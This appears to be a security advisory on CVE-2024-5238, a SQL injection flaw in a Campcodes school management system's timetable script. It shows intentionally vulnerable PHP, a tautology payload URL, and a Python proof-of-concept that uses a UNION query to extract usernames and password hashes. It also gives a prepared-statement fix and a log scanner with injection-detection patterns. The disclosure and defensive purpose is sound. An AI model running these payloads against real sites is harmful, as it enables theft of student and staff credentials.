A critical vulnerability, CVE-2024-5238, affects Campcodes Complete Web-Based School Management System 1.0. The flaw allows remote attackers to perform SQL injection through the grade parameter of /view/timetable_insert_form.php. Since the bug is public, webmasters and school IT staff should patch it as soon as possible.

What’s the Problem?

Campcodes Complete Web-Based School Management System helps educational institutions manage students, staff, and timetables. Unfortunately, missing input validation on the grade argument of a PHP script lets attackers inject arbitrary SQL into queries run against the backend database.

Vulnerability Identifier:
- CVE: CVE-2024-5238
- VDB: VDB-265989

How Does the Exploit Work?

The vulnerable script most likely reads the grade parameter and concatenates it directly into a SQL statement, without any validation or sanitization.

Example Vulnerable Code

// timetable_insert_form.php (hypothetical vulnerable code)
$grade = $_GET['grade'];
$sql = "SELECT * FROM timetable WHERE grade = '$grade'";
$result = mysqli_query($conn, $sql);

// No input validation or sanitization!

If an attacker submits the following URL (quotes and spaces shown unencoded for readability):

https://[target-site]/view/timetable_insert_form.php?grade=1' OR '1'='1

The resulting query becomes:

SELECT * FROM timetable WHERE grade = '1' OR '1'='1'

The condition '1'='1' is always true, so the attacker retrieves every record in the timetable; with more complex payloads (for example a UNION query) they can read other tables, or manipulate or destroy data.

import requests

# Proof-of-concept request; TARGET_SITE is a placeholder for the host under test.
target_url = 'https://TARGET_SITE/view/timetable_insert_form.php'
payload = "1' UNION SELECT 1, username, password, 4 FROM users-- -"

params = {'grade': payload}  # requests URL-encodes the payload for us
response = requests.get(target_url, params=params)

print(response.text)  # May contain usernames/password hashes if the target is vulnerable

Note: Only use this against systems you have permission to test!

How to Fix

Developers: use prepared statements (secure code example)

// Secure: with a prepared statement the grade value is bound as data and never becomes part of the SQL text
$grade = $_GET['grade'] ?? '';
$stmt = $conn->prepare("SELECT * FROM timetable WHERE grade = ?");
if ($stmt === false) {
    throw new RuntimeException("Failed to prepare statement: " . $conn->error);
}
$stmt->bind_param("s", $grade);
$stmt->execute();
$result = $stmt->get_result();
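For administrators who cannot patch immediately, here is an added example (not part of the original advisory or the Campcodes code) that scans web-server access logs for exploitation attempts against this parameter. It decodes each request to /view/timetable_insert_form.php and flags any grade value that is not a plain number; the log lines are constructed samples, and the assumption that legitimate grade values are one- or two-digit numbers is ours.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [23/May/2024:06:20:01 +0000] "GET /view/timetable_insert_form.php?grade=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [23/May/2024:06:21:14 +0000] "GET /view/timetable_insert_form.php?grade=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 98304 "-" "Mozilla/5.0"
203.0.113.12 - - [23/May/2024:06:22:30 +0000] "GET /view/timetable_insert_form.php?grade=1%27+UNION+SELECT+1%2Cusername%2Cpassword%2C4+FROM+users--+- HTTP/1.1" 200 12000 "-" "python-requests/2.31"
203.0.113.13 - - [23/May/2024:06:23:05 +0000] "GET /view/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
VULN_PATH = '/view/timetable_insert_form.php'

# Assumption: a legitimate grade is a short number; anything else deserves a look.
VALID_GRADE = re.compile(r'^\d{1,2}$')
# Common SQL injection markers, used only to label why a value was flagged.
SQLI_TOKENS = re.compile(r"('|--|/\*|\bunion\b|\bselect\b|\bor\b\s+\S+=|\bsleep\(|\bbenchmark\()", re.I)

def analyse_line(line):
    """Return a finding dict for a suspicious request to the vulnerable script, else None."""
    m = LOG_RE.match(line)
    if not m or not m.group('target').startswith(VULN_PATH):
        return None
    qs = parse_qs(urlsplit(m.group('target')).query, keep_blank_values=True)
    for raw in qs.get('grade', []):
        value = unquote_plus(raw)  # second decode catches double-encoded payloads
        if VALID_GRADE.match(value):
            continue
        reason = 'sqli_tokens' if SQLI_TOKENS.search(value) else 'unexpected_value'
        return {'ip': m.group('ip'), 'ts': m.group('ts'), 'grade': value,
                'reason': reason, 'status': int(m.group('status'))}
    return None

def find_suspicious(log_text):
    """Scan a whole log and collect every flagged request."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]

if __name__ == '__main__':
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

A large response size on a flagged request (as in the second sample line) is a useful hint that the injection actually returned extra rows.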

References

- CVE-2024-5238 in NVD
- VDB-265989 in VulDB
- Campcodes Official Page (for updates/patches)

Final Thoughts

CVE-2024-5238 is a high-severity flaw that makes schools’ sensitive data vulnerable to attackers. Patch urgently, audit your code, and never trust user input. Stay safe and keep your school’s data protected!

Timeline

Published on: 05/23/2024 06:15:12 UTC
Last modified on: 06/04/2024 19:21:03 UTC